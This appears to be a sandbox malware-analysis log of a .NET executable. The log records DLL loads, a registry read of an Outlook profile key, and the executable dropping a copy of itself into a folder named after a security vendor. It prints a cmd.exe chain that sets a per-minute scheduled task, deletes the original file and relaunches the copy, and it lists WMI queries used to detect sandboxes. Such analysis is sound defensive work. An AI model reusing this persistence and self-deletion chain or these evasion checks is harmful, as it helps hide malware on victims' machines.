Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: tDLozbx48F.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: tDLozbx48F.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: tDLozbx48F.exe

Static PE information: 0xBF7B9D64 [Tue Oct 20 06:51:16 2071 UTC]

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

File created: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9090

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Memory allocated: 22E48940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Memory allocated: 22E62350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Memory allocated: 1F5FC6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Memory allocated: 1F5FE0A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Memory allocated: 21B50A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Memory allocated: 21B6A5C0000 memory reserve \| memory write watch

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599746	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599634	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599507	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599394	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599268	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598979	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598867	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598756	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598630	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598503	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598176	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 598052	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597924	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597685	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597573	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597462	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597352	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597239	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 597114	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596987	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596733	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596621	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Thread delayed: delay time: 596509	Jump to behavior
